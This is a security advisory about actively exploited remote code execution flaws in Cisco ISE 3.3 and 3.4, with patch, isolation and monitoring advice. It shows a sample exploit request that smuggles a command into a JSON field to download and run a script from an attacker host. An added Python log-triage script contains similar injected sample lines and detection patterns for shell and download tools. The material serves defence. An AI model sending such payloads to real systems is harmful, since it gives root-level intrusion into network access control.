Cisco ISE RCE Vulnerabilities Now Under Exploitation

Overview
In July 2025, Cisco issued an urgent update to its security advisory confirming that multiple critical remote code execution (RCE) vulnerabilities in Identity Services Engine (ISE) are being actively exploited in the wild. These flaws affect ISE versions 3.3 and 3.4, and are considered maximum-severity with CVSS scores of 10.0.
ISE serves as the centralized network access control system for enterprise networks, making it a highly privileged and sensitive platform. If compromised, attackers can potentially manipulate or override core authentication, authorization, and accounting (AAA) mechanisms across the entire environment.
How It Works
Three CVEs have been confirmed as actively exploited, each affecting Cisco ISE’s pre-authentication APIs and file handling:
CVE-2025-20281 & CVE-2025-20337 – API Input Validation Failures
These two vulnerabilities stem from insecure input validation on pre-authentication REST APIs exposed by ISE. A specially crafted request—requiring no authentication—can trigger command injection, allowing the attacker to execute arbitrary code as root.
The vulnerable endpoints may include:
- /admin/API/v1/system/logs
- /api/v1/devices/register
CVE-2025-20282 – Arbitrary File Upload in ISE 3.4
Exclusive to ISE 3.4, this flaw allows unauthenticated file uploads to sensitive paths within the server’s filesystem, bypassing MIME type checks and exploiting weak directory traversal protections.
Sample exploitation request:
POST /api/v1/system/logs
Content-Type: application/json
{
"logLevel": "debug && wget http://attacker.com/x.sh -O /tmp/x.sh && chmod +x /tmp/x.sh && /tmp/x.sh"
}
Risks
The implications of these exploits are severe:
- Complete system takeover: The attacker gains root-level access to the ISE system.
- Compromise of network access control: Rogue devices may gain access or AAA policies may be altered.
- Lateral movement: Attackers can pivot to AD, VPNs, and log servers.
- Stealth and persistence: ISE’s role in NAC may obscure attack traces.
Since ISE is often deployed in protected zones, traditional EDR coverage is limited, making forensic detection difficult.
Real-World Examples
Multiple vendors and SOCs have observed exploitation:
- Secure-ISS reported scans for /api/v1/devices.
- A European healthcare MSP saw attackers deploy Cobalt Strike via ISE exploits.
- A university IT team discovered ISE was abused to allow malware-laden BYOD laptops on core VLANs.
Recommendations
1. Patch Immediately
Upgrade to:
- ISE 3.3 → Patch 7
- ISE 3.4 → Patch 2
2. Isolate API Interfaces
Ensure API and admin interfaces are not internet-exposed. Restrict access via firewall or reverse proxy ACLs.
3. Monitor for Exploitation Artifacts
- Unusual POSTs to vulnerable endpoints
- Suspicious file writes in /tmp, /var/log, /opt
- Command execution logs for shell activity or outbound calls
4. Enable EDR and File Integrity Monitoring
If agents aren't supported, forward logs to SIEM and monitor filesystem activity on critical paths.
5. Rotate Credentials and Secrets
If compromise is suspected, revoke device certs, update RADIUS secrets, and audit AAA logs.
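As an added illustration of the monitoring guidance in recommendation 3 (example code, not from Cisco or the original post): a small Python triage script that runs over request-log lines, flags POSTs to the pre-auth endpoints named above, and inspects JSON string fields for shell metacharacters and references to /tmp, /var/log or /opt. The tab-separated line format and every sample line are constructed assumptions; real ISE log formats differ and the parser would need adapting.

```python
import json
import re
from dataclasses import dataclass

# Pre-auth REST endpoints named in the write-up above.
WATCHED_ENDPOINTS = {
    "/admin/API/v1/system/logs", "/api/v1/system/logs",
    "/api/v1/devices/register", "/api/v1/devices",
}
# Shell metacharacters and download/exec helpers that have no place in a JSON string value.
SHELL_INJECTION = re.compile(r"&&|\|\||;|\$\(|`|\b(?:wget|curl|chmod|bash|sh)\b")
# Filesystem paths the write-up lists as places to watch for suspicious writes.
SENSITIVE_PATHS = re.compile(r"/(?:tmp|var/log|opt)(?:/|\b)")

@dataclass
class Finding:
    line_no: int
    reason: str

def scan_request(line_no, method, path, body):
    """Findings for one request; only POSTs to watched endpoints are inspected."""
    if method != "POST" or path not in WATCHED_ENDPOINTS:
        return []
    findings = [Finding(line_no, f"POST to pre-auth endpoint {path}")]
    try:
        payload = json.loads(body) if body else {}
    except json.JSONDecodeError:
        return findings + [Finding(line_no, "body is not valid JSON")]
    for key, value in payload.items():
        if not isinstance(value, str):
            continue
        if SHELL_INJECTION.search(value):
            findings.append(Finding(line_no, f"shell metacharacters in field {key!r}"))
        if SENSITIVE_PATHS.search(value):
            findings.append(Finding(line_no, f"sensitive path referenced in field {key!r}"))
    return findings

def scan_log(lines):
    """Assumed line format: METHOD<TAB>PATH<TAB>STATUS<TAB>BODY (body may be empty)."""
    findings = []
    for n, line in enumerate(lines, 1):
        method, path, _status, body = line.split("\t", 3)
        findings.extend(scan_request(n, method, path, body))
    return findings
# Constructed sample log (not real ISE output); line 2 mirrors the injection pattern shown above.
SAMPLE_LOG = [
    'POST\t/api/v1/system/logs\t200\t{"logLevel": "info"}',
    'POST\t/api/v1/system/logs\t200\t{"logLevel": "debug && wget http://attacker.invalid/x.sh -O /tmp/x.sh"}',
    'GET\t/api/v1/devices\t401\t',
    'POST\t/api/v1/devices/register\t200\t{"name": "x; curl http://attacker.invalid/a | sh"}',
]
```

Benign POSTs to the watched endpoints still produce the informational finding, so tune the endpoint set and the regexes against a baseline of normal traffic before alerting on them.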
Final Thoughts
Cisco ISE, while often overlooked, is a high-value target. These zero-day RCE flaws show why NAC infrastructure must be treated with the same urgency as domain controllers or perimeter firewalls.
Delaying patches is not an option. Unauthenticated, root-level RCE is the definition of critical. Patch now, monitor deeply, and restrict access aggressively.